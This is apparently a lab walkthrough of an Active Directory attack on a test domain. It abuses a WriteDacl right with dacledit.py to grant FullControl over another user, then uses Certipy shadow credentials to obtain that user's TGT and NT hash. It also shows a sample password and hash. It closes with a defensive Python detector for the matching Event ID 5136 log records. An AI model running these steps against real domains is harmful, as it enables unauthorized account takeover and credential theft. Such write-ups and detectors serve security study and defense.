WriteDacl on User (Ramon-> Nicolas)

  • To exploit WriteDacl from Ramon to Nicolas we can use dacledit.py

  • First we will clone the Impacket fork created by shutdown (@_nwodtuhs) to get the latest PR with dacledit

git clone https://github.com/ThePorgs/impacket.git
cd impacket 
sudo python3 setup.py install
  • Now we can use dacledit.py

  • First let’s look at Ramon’s rights on Nicolas:

dacledit.py -action 'read' -principal Ramon.Maldonado -target 'nicolas.Maduro' 'NewYork.local'/'Ramon.Maldonado':'monkey'
  • OK, now change the permission to “FullControl” and see the modification:

dacledit.py -action 'write' -rights 'FullControl' -principal Ramon.Maldonado -target 'Nicolas.Maduro' 'NewYork.local'/'Ramon.Maldonado':'monkey'

Read the DACL again to see the modification:

dacledit.py -action 'read' -principal Ramon.Maldonado -target 'nicolas.Maduro' 'NewYork.local'/'Ramon.Maldonado':'monkey'
  • OK, now we can:

    • change Nicolas’s password

    • perform targeted Kerberoasting

    • add shadow credentials

  • Let’s just use shadow credentials:

certipy shadow auto -u Ramon.Maldonado@newyork.local -p 'monkey' -account 'Nicolas.Maduro'
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Targeting user 'nicolas.Maduro'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '9943db05-a20e-bd91-5731-8e4ca58eacf6'
[*] Adding Key Credential with device ID '9943db05-a20e-bd91-5731-8e4ca58eacf6' to the Key Credentials for 'nicolas.Maduro'
[*] Successfully added Key Credential with device ID '9943db05-a20e-bd91-5731-8e4ca58eacf6' to the Key Credentials for 'nicolas.Maduro'
[*] Authenticating as 'nicolas.Maduro' with the certificate
[*] Using principal: nicolas.maduro@newyork.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'nicolas.maduro.ccache'
[*] Trying to retrieve NT hash for 'nicolas.maduro'
[*] Restoring the old Key Credentials for 'nicolas.Maduro'
[*] Successfully restored the old Key Credentials for 'nicolas.Maduro'
[*] NT hash for 'nicolas.Maduro': b3b3717f7d51b37fb325f7e7d048e998
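
From the defender's side, the two writes made above (the DACL change on Nicolas, then the Key Credential that Certipy adds and restores) show up as Event ID 5136 records on the domain controller. The following is an added example, not part of the original page or of either tool. It assumes Directory Service Changes auditing is enabled with a SACL covering user objects; the DN, timestamps and allowlisted account names are constructed or hypothetical.

```python
from datetime import datetime, timedelta

ADDED, DELETED = "%%14674", "%%14675"   # 5136 OperationType: value added / deleted
NICOLAS = "CN=Nicolas Maduro,CN=Users,DC=NewYork,DC=local"  # constructed DN
# Hypothetical allowlists; replace with the accounts that legitimately do this.
DACL_WRITERS = {"Administrator"}
KEY_WRITERS = {"svc-aadsync"}

# Constructed sample: Event ID 5136 records reduced to the fields used below
# (time, SubjectUserName, ObjectDN, AttributeLDAPDisplayName, OperationType).
EVENTS = [
    ("2023-01-01T10:00:05", "Ramon.Maldonado", NICOLAS, "nTSecurityDescriptor", DELETED),
    ("2023-01-01T10:00:05", "Ramon.Maldonado", NICOLAS, "nTSecurityDescriptor", ADDED),
    ("2023-01-01T10:04:10", "Ramon.Maldonado", NICOLAS, "msDS-KeyCredentialLink", ADDED),
    ("2023-01-01T10:04:15", "Ramon.Maldonado", NICOLAS, "msDS-KeyCredentialLink", DELETED),
    ("2023-01-01T11:00:00", "svc-aadsync", "CN=Some User,CN=Users,DC=NewYork,DC=local",
     "msDS-KeyCredentialLink", ADDED),
]

def detect(events, window=timedelta(minutes=30)):
    """Return (severity, subject, object DN, reason) for suspicious writes."""
    findings, last_dacl = [], {}
    for ts, subject, dn, attr, op in sorted(events, key=lambda e: e[0]):
        if op != ADDED:                      # only the newly written value matters
            continue
        when = datetime.fromisoformat(ts)
        if attr == "nTSecurityDescriptor" and subject not in DACL_WRITERS:
            last_dacl[(subject, dn)] = when  # remember who re-ACLed which object
            findings.append(("medium", subject, dn, "DACL modified"))
        elif attr == "msDS-KeyCredentialLink" and subject not in KEY_WRITERS:
            prior = last_dacl.get((subject, dn))
            chained = prior is not None and when - prior <= window
            findings.append(("high" if chained else "medium", subject, dn,
                             "key credential added after DACL change" if chained
                             else "key credential added by unexpected account"))
    return findings

if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(*finding, sep=" | ")
```

Because Certipy restores the old Key Credentials at the end of the run, checking the attribute's current value afterwards shows nothing; the add event in the log is the durable trace.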
